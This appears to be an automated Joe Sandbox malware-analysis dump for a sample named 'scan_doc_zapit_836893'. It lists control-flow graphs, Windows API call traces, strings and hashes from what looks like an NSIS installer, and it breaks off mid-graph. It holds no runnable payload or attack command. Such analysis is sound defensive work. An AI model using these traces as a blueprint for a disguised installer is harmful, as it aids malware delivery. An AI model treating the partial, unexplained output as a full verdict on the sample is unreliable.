WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4193 401eb9 4194 401f24 4193->4194 4195 401ec6 4193->4195 4196 401f53 GlobalAlloc 4194->4196 4197 401f28 4194->4197 4198 401ed5 4195->4198 4205 401ef7 4195->4205 4199 406805 18 API calls 4196->4199 4204 4062a3 11 API calls 4197->4204 4209 401f36 4197->4209 4200 4062a3 11 API calls 4198->4200 4203 401f46 4199->4203 4201 401ee2 4200->4201 4206 402708 4201->4206 4211 406805 18 API calls 4201->4211 4203->4206 4207 402387 GlobalFree 4203->4207 4204->4209 4215 406009 lstrcpynW 4205->4215 4207->4206 4217 406009 lstrcpynW 4209->4217 4210 401f06 4216 406009 lstrcpynW 4210->4216 4211->4201 4213 401f15 4218 406009 lstrcpynW 4213->4218 4215->4210 4216->4213 4217->4203 4218->4206 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                      • GetClientRect.USER32(?,?), ref: 00405196
                                                      • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                      • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                        • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                      • ShowWindow.USER32(00000000), ref: 004052E7
                                                      • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                      • ShowWindow.USER32(00000008), ref: 00405333
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                      • CreatePopupMenu.USER32 ref: 00405376
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                      • GetWindowRect.USER32(?,?), ref: 0040539E
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                      • OpenClipboard.USER32(00000000), ref: 0040540B
                                                      • EmptyClipboard.USER32 ref: 00405411
                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                      • CloseClipboard.USER32 ref: 0040546E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                      • String ID: @rD$New install of "%s" to "%s"${
                                                      • API String ID: 2110491804-2409696222
                                                      • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                      • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                      • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                      • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 OleUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                      APIs
                                                      • #17.COMCTL32 ref: 004038A2
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                      • OleInitialize.OLE32(00000000), ref: 004038B4
                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                      • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                      • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                      • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                      • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                      • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                      • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                      • OleUninitialize.OLE32(?), ref: 00403AD1
                                                      • ExitProcess.KERNEL32 ref: 00403AF1
                                                      • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                      • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                      • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                      • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                      • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                      • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                      • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                      • API String ID: 2435955865-239407132
                                                      • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                      • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                      • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                      • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 787 4074bb-4074c0 788 4074c2-4074ef 787->788 789 40752f-407547 787->789 791 4074f1-4074f4 788->791 792 4074f6-4074fa 788->792 790 407aeb-407aff 789->790 796 407b01-407b17 790->796 797 407b19-407b2c 790->797 793 407506-407509 791->793 794 407502 792->794 795 4074fc-407500 792->795 798 407527-40752a 793->798 799 40750b-407514 793->799 794->793 795->793 800 407b33-407b3a 796->800 797->800 803 4076f6-407713 798->803 804 407516 799->804 805 407519-407525 799->805 801 407b61-407c68 800->801 802 407b3c-407b40 800->802 818 407350 801->818 819 407cec 801->819 807 407b46-407b5e 802->807 808 407ccd-407cd4 802->808 810 407715-407729 803->810 811 40772b-40773e 803->811 804->805 806 407589-4075b6 805->806 814 4075d2-4075ec 806->814 815 4075b8-4075d0 806->815 807->801 812 407cdd-407cea 808->812 816 407741-40774b 810->816 811->816 817 407cef-407cf6 812->817 820 4075f0-4075fa 814->820 815->820 821 40774d 816->821 822 4076ee-4076f4 816->822 823 407357-40735b 818->823 824 40749b-4074b6 818->824 825 40746d-407471 818->825 826 4073ff-407403 818->826 819->817 829 407600 820->829 830 407571-407577 820->830 831 407845-4078a1 821->831 832 4076c9-4076cd 821->832 822->803 828 407692-40769c 822->828 823->812 833 407361-40736e 823->833 824->790 838 407c76-407c7d 825->838 839 407477-40748b 825->839 844 407409-407420 826->844 845 407c6d-407c74 826->845 834 4076a2-4076c4 828->834 835 407c9a-407ca1 828->835 847 407556-40756e 829->847 848 407c7f-407c86 829->848 836 40762a-407630 830->836 837 40757d-407583 830->837 831->790 840 407c91-407c98 832->840 841 4076d3-4076eb 832->841 833->819 849 407374-4073ba 833->849 834->831 835->812 850 40768e 836->850 851 407632-40764f 836->851 837->806 837->850 838->812 846 40748e-407496 839->846 840->812 841->822 852 407423-407427 844->852 845->812 846->825 856 407498 846->856 847->830 848->812 854 4073e2-4073e4 849->854 855 4073bc-4073c0 849->855 850->828 857 407651-407665 851->857 858 407667-40767a 851->858 852->826 853 407429-40742f 852->853 860 407431-407438 853->860 861 407459-40746b 853->861 864 4073f5-4073fd 854->864 865 4073e6-4073f3 854->865 862 4073c2-4073c5 GlobalFree 855->862 863 4073cb-4073d9 GlobalAlloc 855->863 856->824 859 40767d-407687 857->859 858->859 859->836 866 407689 859->866 867 407443-407453 GlobalAlloc 860->867 868 40743a-40743d GlobalFree 860->868 861->846 862->863 863->819 869 4073df 863->869 864->852 865->864 865->865 871 407c88-407c8f 866->871 872 40760f-407627 866->872 867->819 867->861 868->867 869->854 871->812 872->836
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                      • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                      • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                      • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                      • String ID:
                                                      • API String ID: 310444273-0
                                                      • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                      • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                      • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                      • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                      • FindClose.KERNEL32(00000000), ref: 004062EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                      • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                      • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                      • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow EndDialog 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                      • ShowWindow.USER32(?), ref: 004054D2
                                                      • DestroyWindow.USER32 ref: 004054E6
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                      • GetDlgItem.USER32(?,?), ref: 00405523
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                      • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                      • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                      • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                      • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                      • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                      • EnableWindow.USER32(?,?), ref: 00405757
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                      • EnableMenuItem.USER32(00000000), ref: 00405774
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                      • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                      • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                      • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: @rD
                                                      • API String ID: 3282139019-3814967855
                                                      • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                      • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                      • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                      • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 